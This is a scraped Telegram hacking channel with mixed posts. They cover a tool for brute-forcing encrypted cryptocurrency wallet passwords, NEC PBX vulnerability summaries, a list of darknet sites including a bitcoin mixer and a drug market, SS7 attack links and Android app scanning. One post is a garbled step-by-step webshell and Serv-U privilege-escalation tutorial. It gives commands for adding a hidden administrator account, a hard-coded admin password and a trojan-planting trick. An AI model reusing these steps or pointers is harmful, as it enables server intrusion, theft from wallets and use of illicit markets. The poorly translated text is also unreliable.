UNDERCODE SECURITY
226 subscribers
295 photos
1.03K files
1.73K links
πŸ¦‘WELCOME IN UNDERCODE TESTING FOR LEARN HACKING | PROGRAMMING | SECURITY & more..

THIS CHANNEL BY :

@UndercodeTesting
UndercodeTesting.com (official)

@iUndercode
iUndercode.com (iOs)

@Dailycve
DailyCve.com


@UndercodeNews
UndercodeNews.com
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ANOTHER BITCOIN HACKING
-Bruteforce wallet
The purpose of this program is to try to find the password of an
encrypted Peercoin (or Bitcoin, Litecoin, etc...) wallet file (i.e. wallet.dat).

It can be used in two ways:

βž–try all the possible passwords given a charset
βž–try all the passwords in a file
There is a command line option to specify the number of threads to use.

Sending a USR1 signal to a running bruteforce-wallet process makes it print progress and continue

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1️⃣apt install libdb-dev libssl-dev -y

2️⃣git clone https://github.com/glv2/bruteforce-wallet.git

3️⃣./autogen.sh

4️⃣Then, build the program with the commands:

./configure
make

5️⃣make install

6️⃣EXAMPLES :

1) Try to find the password of an encrypted wallet file using 4 threads, trying only passwords with 5 characters:

bruteforce-wallet -t 4 -l 5 -m 5 wallet.dat

2) Try to find the password of an encrypted wallet file using 8 threads, trying only passwords with 5 to 10 characters beginning with "W4l" and ending with "z":

bruteforce-wallet -t 8 -l 5 -m 10 -b "W4l" -e "z" wallet.dat

3) Try to find the password of an encrypted wallet file using 8 threads, trying only passwords with 10 characters using the character set "P8Ε­":

bruteforce-wallet -t 8 -l 10 -m 10 -s "P情8ŭ" wallet.dat

4) Try to find the password of an encrypted wallet file using 6 threads, trying the passwords contained in a dictionary file:

bruteforce-wallet -t 6 -f dictionary.txt wallet.dat

5) Print progress info:

pkill -USR1 -f bruteforce-wallet

6) Print progress info every 30 seconds:

bruteforce-wallet -t 6 -f dictionary.txt -v 30 wallet.dat

7) Save/restore state between sessions:

bruteforce-wallet -t 6 -f dictionary.txt -w state.txt wallet.dat

> (Let the program run for a few minutes and stop it)
bruteforce-wallet -t 6 -w state.txt wallet.dat

πŸ¦‘Tested by undercode on :

> parrot

> ubuntu

> kali

ENJOYβ€οΈπŸ‘πŸ»
βœ…Topic git
@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Methode about- NEC broke a large number of security loopholes, or will affect all small and medium-sized enterprises and governments!
β–ͺ️Which methode they use ? & How ?

#News

Japan's NEC is one of the world's leading suppliers of IT and communication networks and one of the world's top 500 companies. NEC is mainly engaged in the research and development, cluster software, production and sales of IT services, platform business, operator networks, social infrastructure, personal solutions and other products. There are more than 15,000 products. NEC conducts business in more than 150 countries and regions around the world , Integrate advanced information technology and network technology to provide excellent comprehensive solutions to governments, enterprises and individuals.

However, on July 30, NEC was exposed to a large number of security vulnerabilities in its communications products and solutions. Many of its communications servers and telephone switches were recruited, which may affect all small and medium-sized enterprises and governments. It should be noted that these vulnerabilities that were exposed have existed last year.

The following are the details of the vulnerability:

1. CVE-2019-20025: Static user authentication credentials provide manufacturer-level access to the web configuration utility.

CVSS score: 9.8 (serious)

NEC SV9100 is a unified communication solution of NEC Corporation. Its IP communication server UNIVERGE SV9100 is a feature-rich unified communication function system used by thousands of small and medium-sized enterprises. Some specific versions of SV9100 software It may allow remote unauthenticated attackers to use hard-coded user names and passwords (also known as static certificate vulnerabilities) to log in to devices running affected versions. The vulnerability is caused by an undocumented user account with the manufacturer's privilege level. An attacker can exploit this vulnerability by using this account to remotely log in to the affected device. Successful exploitation of this vulnerability could allow an attacker to log in to the device with manufacturer-level access rights. This vulnerability affects SV9100 PBX running software version 6.0 or higher. This vulnerability does not affect SV9100 software versions before 6.0.

2. CVE-2019-20026: The password reset function can be accessed from an unprivileged context.

The WebPro interface in SV9100 software version 7.0 or later allows an unauthenticated remote attacker to reset all existing usernames and passwords to default values ​​through a carefully designed request.

CVSS score: 9.8 (serious)

3. CVE-2019-20027: A potentially misconfigured system may allow successful authentication using blank credentials.

Aspir (phone system) derivative products NEC PBX switches, including SV8100, SV9100, SL1100 and SL2100 with software version, if not configured properly, it may allow entering a blank username and password combination as a valid successful authentication account.

CVSS score: 6.4 (medium)

4. CVE-2019-20028: Access to voice mail from a web server without authentication

NEC PBX, a derivative of Aspire running InMail software (including SV8100, SV9100, SL1100 and SL2100), allows unauthenticated read-only access to voice mail, greetings, and voice response system content through the system's WebPro management interface.

CVSS score: 7.5 (high)

5. CVE-2019-20029: Privilege escalation allows hidden developer access in the web configuration utility.

There is an exploitable privilege escalation vulnerability in the WebPro function of NEC PBX from Aspire. The affected products and versions include SV8100, SV9100, SL1100 and SL2100. A specially crafted HTTP POST may lead to privilege escalation, resulting in higher privileged accounts, including undocumented developer access.

CVSS score: 8.8 (high)

6. CVE-2019-20030: Able to access the local network through the voice mail system.
There are security loopholes in NEC UM8000 (a voice mail solution). Attackers with modem access numbers on NEC UM8000 voice mail systems can use SSH tunnels or standard Linux utilities to access the system’s LAN ports.

CVSS score: 10.0 (serious)

7. CVE-2019-20031: The risk of brute force attacks on voicemail passwords has been mitigated.

NEC UM8000, UM4730 and previous non-InMail voicemail systems with all known software versions may allow countless login attempts in the telephone user interface (TUI), effectively performing a brute force attack.

CVSS score: 7.7 (high)

8. CVE-2019-20032: "Find me/follow me" function allows access to the modem interface from any voice mailbox

The attacker can access the InMail voice mailbox equipped with the "find/follow me" function on NEC PBX (including SV8100, SV9100, SL1100 and SL2100) derived from Aspire, and can access the system's management modem.

CVSS score: 7.1 (high)

9. CVE-2019-20033: The accessible DIM interface after establishing a PPP connection has static user authentication credentials.

On NEC PBX (including SV8100), a derivative of Aspire, a set of documented static login credentials can be used to access the DIM interface.

CVSS score: 9.8 (serious)

Bug fix

At present, NEC company has not released repair measures to solve this security problem. It is recommended that users who use this communication solution pay attention to the NEC homepage or refer to the website for solutions: https://www.nec.com/

ENJOYβ€οΈπŸ‘πŸ»
βœ…Topic git
@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘Methode about- NEC broke a large number of security loopholes, or will affect all small and medium-sized enterprises and governments!
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘2020 Бписок Ρ‚Π΅ΠΌ DarkNet Бписок сайтов для русскоязычных ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΉ:
- 2020 Topic list DarkNet list of sites for Russian-speaking users:



http://lwplxqzvmgu43uff.onion - Runion, Anonymous Forum: Bitcoin, Tor, Free Market;

http://bitmixbizymuphkc.onion is the best bitcoin mixer , you can mix BTC, ETH, LTC.

buybit4xcbat2cwn.onion RU BuyBit - instant purchase and sale of bitcoin (with Qiwi integration), the service does not require any confirmation and accepts payment from terminals. Good online support that solves your questions online. Online discussion;

http://totetxidh73fm4e3.onion - Totet, bitcoin tote;

https://onion.cab - clearnet (!) onion.cab, view hidden onion sites without Tor;

http://facebookcorewwwi.onion - Facebook, the same one));

http://sms4tor3vcr2geip.onion - SMS4TOR, a self-destruct message service;

http://oi4bvjslpt5gabjq.onion - RΓ©publique de Hackers, another hacker forum in French;

http://pwoah7foa6au2pul.onion - Alphabay market;

http://mail2tor2zyjdctd.onion - Mail2Tor, e-mail service;

http://torbox3uiot6wchz.onion - TorBox, e-mail service inside .onion;

http://zw3crggtadila2sg.onion/imageboard - TorChan, "Tor's # 1 imageboard";

http://cyjabr4pfzupo7pg.onion - CYRUSERV, a jabber service from CYRUSERV;

http://rutorc6mqdinc4cz.onion - RuTor.org, a well-known torrent tracker;

http://flibustahezeous3.onion is a famous electronic library in an onion version.

enjoyβ€οΈπŸ‘πŸ»
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How recover any hacked youtube channel ?
Fix a hacked YouTube account - Official Support
βž–Please read ALL of this carefully, and do NOT ignore any part. If you do- you lower your chances of getting help from me.
#requested

a) In order to deal with a hacking you must first "report" (it's not really a report, but it does trigger something at their end) the Google Account's hacking to Google. For this you need to follow instructions here: https://support.google.com/youtube/answer/76187, and pick the instructions according to what applies to your case. But you must do it as best you can, before moving on to:

b) Then (and only then. Meaning that you must do a) above before you do this, part b)) please can you contact me in private on Google Hangouts: https://hangouts.google.com/chat/person/104217083390665628628 with* (as in- do not contact me without it because I will ignore you) the following info

1) The URL of this, your** thread (for my reference), and without which I cannot assist you,

2) The unique /channel/ URL (no other URL will do) of your YouTube channel (which, by the way, is: https://www.youtube.com/channel/UC5ouqw6hydKaGHWEGoaYieg

3) The email address you use for your hacked Google Account,
Full (URLs/email headers included) screen-grabs of the notifications Google would have sent you about the hacking,

4) Indication of any changes made by the hacker (videos uploaded, name/artwork changed etc)

5) An indication of when this happened, and-
confirm here if you can use the email in 3. above (if not- can you provide an alternative contact email, preferably one used by your Google Account in some way)

Once I have it, I will pass the info onto YouTube support. And, maybe YouTube support will be able to assist. Note the "maybe". Because there are no guarantees that the hijacking team will be able verify that hacking took place if there wasn't a hacking as such.

I, personally, wont be told much because it is obviously confidential to you, but I do suggest that you stand by in case they need more info and ask me/you directly. But, remember, they only can try to help you if you've done a) above.

c) Once you have regained control/access of your Google Account it is important/essential that you initiate two-step verification:https://www.google.com/landing/2step/ and get a decent virus detection/removal software for your devices to protect your Google Account in future. More here (and you really should read it): https://support.google.com/accounts/answer/46526


enjoyβ€οΈπŸ‘πŸ»
By Youtube Administration
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Packages_that_actively_seeks_vulnerable_exploits_in_the_wild_More.pdf
499 KB
Packages that actively seeks vulnerable exploits in the wild. More of an umbrella group for similar packages.
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘new resources for #SS7/Telecom Specific

-ss7 hacking https://www.firstpoint-mg.com/blog/ss7-attack-guide/

- [D1T2 - Bypassing GSMA Recommendations on SS7 Networks - Kirill Puzankov]

- http://www.hackitoergosum.org/2010/HES2010-planglois-Attacking-SS7.pdf

- [Getting in the SS7 kingdom: hard technology and disturbingly easy hacks= to get entry points in the walled garden](http://www.hackitoergosum.org/2010/HES2010-planglois-Attacking-SS7.pdf)

-https://www.cspsprotocol.com/ss7-hack/

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘SS7 Hack Or SS7 Attack ?


> SS7 hack or signaling system 7 hack is the process of getting calls or SMS for a subscriber, on another mobile number or in an application. These days many applications use confirmation of user identity using SMS or voice call. If somehow call and SMS can be routed to another number then it is possible to hack. In this ss7 hack tutorial, the ss7 protocol and call flows will be explained. The Hack tutorial covers the voice call and SMS hacking over ss7.

> Ss7 vulnerability exposes the network for SMS and voice hack. Along with this, once access to the ss7 network, the real-time location of a person can be obtained.

> SS7 is the traditional network that uses standard ISUP and MAP protocol for call and SMS.

> SS7 hack is not simple as it looks, people claim to install software and then just enter phone number to hack SMS or calls. Getting calls and SMS via a hack is the process to connect to the ss7 network and run an application so that the home network of an original subscriber gets the impression that software is the roaming VLR/MSC node in a network. The first step is to get the ss7 connection.


wiki source:)
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Webshell privilege escalation method server privilege escalation tutorial - BY UNDERCODE

A: First test to see whether the site's server to open 3389
Remote Terminal
II: test to see whether the service is used serv-u (as well as what version)
Method
One: to copy a Web site connected with the 3389 landers about (success)
can connected, the chances of winning server, a 30% increase in
two: check under a server using ftp mode version
start - run - cmd - ftp (add you to the landing site)
-------- -------------------------------------------------- ----------------------------- The
first step: The easiest way is to
see if you have permission and whether you can execute the command, if you do, go straight Pass a pigeon run (very low success rate)
---------------------------------------- ------------------------------------------------
Second Step: Find the directory with execution permission
c:\winnt\system32\inetsrv\data\
c:\Documents and Settings\All Users\
c:\Program Files\serv-u\
C:\Program Files\Microsoft SQL Server\
Such a directory can upload pigeons directly and run
-------------------------------------------------- ---------------------------------The
third step: upload a cmd and open account ftp.exe directly to add account
command that you upload directory D: \ VMware Workstation \ cmd.exe "NET > USER
--------------------------- -------------------------------------------------- ------
step four: asp Trojan mention the right to directly mention the right to serv-u 6.3 version seems to mention the right to use asp Trojans (unsuccessful)

Serv-U version 6.2 seems to be
but can not put power asp Trojan also look server, set the metamorphosis does not assume asp mention the right directly after successful or unsuccessful, but in connection with this account it under cmd the FTP (plus you mention the right site)
account: LocalAdministrator password: $ ak # .1k ; 0 @ p "> # 1@$ak#.1k ; 0 @ p
after connection if successful administrator account can be added directly to the
command: quote site exec (add your account) the User 123 123 NET / AD
quote Site Exec (Elevate the account to the highest authority) net localgroup administartors
123 /add
-------------------------------------------------- -------------------------------------
Step 5: pcaanywhere
C:\Documents and Settings\All the Users \ the Application
the Data \ the Symantec \ pcAnywhere \
here under his GIF files locally installed pcanywhere up
a lot of online tutorials
-------------------------- -------------------------------------------------- -----------
step Six: serv-u mention the right coverage
local install a su, your own ServUDaemon.ini files downloaded from his ServUDaemon.ini
many online tutorials
--- -------------------------------------------------- -----------------------------------
step Seven: Serv-U port forwards
to ever do Latte salt a a (serv-u classic mention the right to a full tutorial) had used this method, you can learn about
uploading a port forwarding tool
command tool name :() -v -l 3333 -r 43958 127.0.0.1
means it is to map the port to 3333 On port 43958. Then you can install a Serv-u locally, create a new server,
Fill in the IP of the other party, the account is LocalAdministrator and the
password is $ak#.1k;0@p">#1@$ak#.1k;0@p,
after connecting you can manage his Serv-u
--- -------------------------------------------------- ---------------------------------------
Step 8: Promotion of Social Engineering
the gray pigeons reached the top, then transfer to the c drive, waiting for an administrator to run the premise that you have to avoid killing pigeons
and if I see a clear exe program, opening the old want to see, Oh (estimate Wouldn't you order without that SB?)

E N J O Y β€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How to restrict employees' computers from installing programs at will and how to allow specific programs :

The whole process of software installation only takes a few seconds, and the software is automatically hidden after installation. You need to use shortcut keys to call out and enter the password before you can see the interface. All functions are on the interface, just check the item to be controlled, and the check will take effect. Although the operation is very simple, the functions of this software are really powerful. Its functions mainly include:

1️⃣USB storage device management.

1. It is forbidden to connect the computer to all USB storage devices, including USB flash drives, mobile hard drives, mobile phones, tablets, etc., and it does not affect USB mice, keyboards, and dongles.

2. Set a specific U disk, that is, the computer can only recognize the U disk in the whitelist. At the same time, you can also set secondary permissions for a specific U disk.

3. It is only allowed to copy files from the USB flash drive to the computer, and prohibits the computer from copying files to the USB flash drive, or only allows the computer to copy files to the USB flash drive, and prohibits the USB flash drive to copy files to the computer.

4. Password permission setting. The administrator password is required when setting files to be copied from the computer to the U disk or mobile hard disk.

5. Disable the CD/DVD drive and disc drive burning function, but allow the CD drive to read and disable the floppy drive.

6. Monitor copy records of USB storage devices. It records in detail the log when the U disk copy computer files, including copy time, file name, etc.

2️⃣ The bottom layer protection of the operating system.

Disable Registry, Disable Device Manager, Disable Group Policy, Disable Computer Management, Disable Task Manager, Disable Msconfig, Disable Safe Mode, Disable CD Boot Computer, Disable Infrared, Disable Serial/Parallel, Disable 1394, Disable PCMCIA, Disable Modem , Disable U disk to start the computer, disable DOS commands, disable formatting and Ghost, disable IP/Mac modification, block PrtScn, block Esc key, block clipboard, block network sharing, block viewing processes, block Win key, block Ctrl+Alt +A key, disable Telnet, automatically hide operation when booting system, set global whitelist, prohibit LAN communication, disable virtual machine, prohibit user creation, disable wired network card, disable wireless network card, prohibit installation of portable WIFI, disable Bluetooth, login password setting, The software calls out hot key management, installation directory authority management, UAC management, recovery management, etc.

3️⃣ Management of network leaks.

1. Leaking secrets of chat software is prohibited. Set specific QQ, allow xy chat but prohibit file transfer, prohibit xy group file transfer, prohibit WeChat file transfer, etc.

2. It is forbidden to transfer files outside the mailbox. Forbid to log in to all mailboxes, allow to log in to specific mailboxes, only allow receiving mail, prohibit sending mail, etc.

3. It is forbidden to transfer files from the network disk. It is forbidden to use all network disks and cloud disks, and you can also set to use specific network disks and cloud disks.

4. Program black and white list management. Set a list of prohibited programs, or set a list of only allowed programs.

5. Web page black and white list management. Set a list of URLs that are forbidden to open, or set a list of URLs that are only allowed to be opened.

6. It is forbidden to log in to forums, blogs, post bars, spaces, etc., use FTP to upload files, and prohibit mobile phones and computers from transferring files to each other over the network.


E N J O Y β€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How to become a hacker? How to learn hackers from 0 ?

> If you want to be a real hacker, let me say a few points first. First of all, to be a hacker is interest, curiosity, and general knowledge. As long as you have this, you can be a hacker.

> Generally speaking, people who like to be hackers are especially fond of hackers. His Internet level and IQ will continue to improve every day. It is higher than ordinary people's thinking because he has a sense of exploration and curiosity. It is not only a genius who can be a hacker. Of course, ordinary knowledge is also essential. When you are a hacker, you will learn what you have not learned, and you will experience suffering or despair, but if you really want to be a hacker, you must There is only success, no failure because once you give up, there is no hope.

> In the real network world, there are not only WINDOWS, but also LINUX, and various operating systems such as UNIX. The WINDOWS operating system is the most vulnerable to attack. Why? Because the people who use it are the most, and many of the people who use it don't pay attention to safety protection at all, computer novices, these users have very weak awareness of safety protection on software or hardware.

1️⃣First learn the basics of computer systems. This includes windows and linux. Linux recommends learning centos. The reason is that it’s free. The kali and other system commands that will be used in the future are almost the same. In fact, it is to learn the basics of the system. Various services, such as the construction of dns dhcp server, the construction of mail server and so on.

2️⃣ Learn the basics of the network, starting from the seven-layer protocol, and then to switch configuration and routing.

3️⃣Learn how to build a website and a database. If you haven't built a website before, how can you infiltrate it? At the very least, you have to know how to add, delete, modify, and check the database. Or else, how to do SQL hand notes in the future?

4️⃣ Next, you can learn hacking techniques and find yourself a goal. For example, you must first learn basic vulnerabilities, learn logic vulnerabilities, or learn top10 first. There are more tutorials on the Internet, but they are uneven Qi, it is better to have an old driver take the area.

5️⃣ While learning infiltration, you must also learn languages. It is recommended to learn c or python first, then java.

E N J O Y β€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ How can hackers use mobile phones to attack?

1️⃣ Control the server to attack

Generally speaking, hackers have a lot of server resources in their hands, and these server hackers can also connect remotely through mobile phones, and then enter commands to carry out remote attacks. If you use this method to attack, the attack that a computer can launch can also be achieved through a mobile phone, and there is no need to carry a laptop with you. It is no exaggeration to say that as long as a hacker can connect to the server remotely, any mobile phone may become its attack tool.



2️⃣ Launch an attack through the phone itself

This method will have higher requirements for mobile phones. Not all mobile phones can be realized. Apple is basically impossible. Android phones have a chance to try. So how does a hacker attack others through the Android system?

First of all, the first is to fake wifi hotspots: we all know that nowadays wifi is an indispensable part of our lives. Connecting to wifi in public is also a routine operation, so forging a fake wifi hotspot also has an opportunity to attack others The mobile phone is also a breeze.

The second is badusb hijacking: the operation of this method is that as long as the USB cable connected to the mobile phone is inserted into the computer, the computer will automatically execute the command, and the final result is the computer collapse.

Finally, there is the complete toolkit of Cary Linux. The most powerful part of this mobile phone attack is that it can launch an attack without a remote server.


3️⃣ Hackers don't like to use mobile phones
Mobile phones are usually Android or Apple systems. In fact, most of the hacker software is computer software, and mobile phones cannot run. Therefore, it is impossible to implement hacking techniques on mobile phones, and it seems very tasteless, and no hackers like to hold one. The little mobile phone slowly tapped the code. On the computer, the hacker's favorite is not the window system, but the kali linux system for hackers .

4️⃣What should I do if I want to learn hacking techniques through mobile phones?
Using a mobile phone to do hackers seems very tasteless, but it is indeed a good choice to learn hacking skills with a mobile phone. It has become the norm to learn hacker knowledge through the Internet, but because the computer is very inconvenient to carry, mobile phones are the mainstream now. How good is it to be able to learn hacking knowledge on a mobile phone? For this reason, the editor brings you benefits

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from Backup Legal Mega
πŸ¦‘Udemy - How to Draw Folds, Clothes and Draperyβ€”2 Gbβ€”

https://mega.nz/folder/Osd1GIQT#d3Q2x9cEfwuLQt7nZUQO4g
Forwarded from Backup Legal Mega
πŸ¦‘LinkedIn - Review and Manage the SAP MRP List

https://mega.nz/folder/esM1haZJ#CCfHSuO5duxRPMLxgWDGOg
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Interesting News :
The report states that the cost of remediation of a company's "super large" data breach may be as high as US$392 million
:
#News

> According to foreign media ZDNet, in the past year, the average cost of "very large" data breaches has increased astronomically, and companies affected by such security incidents are expected to pay as much as US$392 million. Now, data breaches are commonplace. Cyber ​​attacks against companies have spawned a new cyber insurance industry. There have been regulations and class actions against companies that fail to protect data, and new lawsβ€”such as the EU’s GDPRβ€”can be used Heavy penalties are imposed on data controllers with lax security.

<> However, data breaches continue to occur, some of which result in consumer records being stolen and sold on underground forums, increasing the risk of identity theft. In order to deal with the consequences of data breaches, companies may need to spend money to repair systems and upgrade architectures, may need to invest in new network security services and network forensics, and may also face legal proceedings or penalties from regulatory authorities-if customer PII is involved, the cost is still year by year increase.

> On Wednesday, IBM released its annual "Data Breach Cost Report" , which stated that the average cost of a data breach is now $3.86 million. Although this average is down by 1.5% compared to 2019, when more than 50 million consumer records are involved, the remediation cost of these "ultra-large" data breaches may be as high as US$392 million, up from 3.88 in 2019 One hundred million U.S. dollars.

> If an organization acts as the data controller for 40-50 million records, the average cost is US$364 million, and the organization may face a cost of up to US$175 per consumer record involving data theft or leakage. The research was conducted by the Ponemon Institute and included interviews with more than 3,200 security professionals who worked at companies that experienced data breaches in the past year.

> As highlighted by the recent Twitter hacking incident, leaked employees and internal accounts are one of the most expensive factors in data breaches today, making the average cost of a data breach as high as $4.77 million. When it comes to internal accounts, 80% of incidents result in exposure of customer records. In total, stolen or leaked account credentials – along with cloud misconfigurations – accounted for nearly 40% of security incidents.

> IBM said that in one-fifth of data breaches, leaked account credentials were used as an attacker's entry point, resulting in more than 8.5 billion records exposed in 2019 alone. Cloud misconfiguration accounted for nearly 20% of network vulnerabilities. Exploiting third-party vulnerabilities, such as zero-day or unpatched security vulnerabilities in enterprise software, is also an expensive factor in data leakage. If an enterprise company suffers a data breach due to such vulnerabilities, it is estimated that it will be compensated up to $4.5 million.

> State-sponsored attacks, including those carried out by Advanced Persistent Threats (APT) organizations, are far less common, accounting for only 13% of the overall data breaches reported by companies. However, when these threat actors are involved, the losses they cause often result in higher recovery costs, representing an average of US$4.43 million.

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘hack android via termux/Linux - AndroBugs Framework is an Android vulnerability analysis system that helps developers or hackers find potential security vulnerabilities in Android applications. No splendid GUI interface, but the most efficient (less than 2 minutes per scan in average) and more accurate.

F E A T U R E S :

-Find security vulnerabilities in an Android app
-Check if the code is missing best practices
-Check dangerous shell commands (e.g. β€œsu”)
-Collect Information from millions of apps
-Check the app’s security protection (marked as <Hacker>, designed for app repackaging hacking)

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1️⃣FOR LINUX - Termux (root)

1) CLONE https://github.com/AndroBugs/AndroBugs_Framework

2) cd AndroBugs_Framework

3) python androbugs.py -f [APK file]

> python androbugs.py -h

Usage of Massive Analysis Tools for Unix/Linux
Prerequisite: Setup MongoDB and config your own MongoDB settings in "androbugs-db.cfg"

4) To run the massive analysis for AndroBugs Framework:####

> python AndroBugs_MassiveAnalysis.py -b [Your_Analysis_Number] -t [Your_Analysis_Tag] -d [APKs input directory] -o [Report output directory]
Example:

5) To get the summary report and all the vectors of massive analysis:

> python AndroBugs_MassiveAnalysis.py -b 20151112 -t BlackHat -d ~/All_Your_Apps/ -o ~/Massive_Analysis_Reports


python AndroBugs_ReportSummary.py -m massive -b [Your_Analysis_Number] -t [Your_Analysis_Tag]

πŸ¦‘Example:

> python AndroBugs_ReportSummary.py -m massive -b 20151112 -t BlackHat

6) To list the potentially vulnerable apps by Vector ID and Severity Level (Log Level):####

>python AndroBugs_ReportByVectorKey.py -v [Vector ID] -l [Log Level] -b [Your_Analysis_Number] -t [Your_Analysis_Tag]
python AndroBugs_ReportByVectorKey.py -v [Vector ID] -l [Log Level] -b [Your_Analysis_Number] -t [Your_Analysis_Tag] -a
Example:

7) python AndroBugs_ReportByVectorKey.py -v WEBVIEW_RCE -l Critical -b 20151112 -t BlackHat

> python AndroBugs_ReportByVectorKey.py -v WEBVIEW_RCE -l Critical -b 20151112 -t BlackHat -a

E N J O Y β€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE HACKING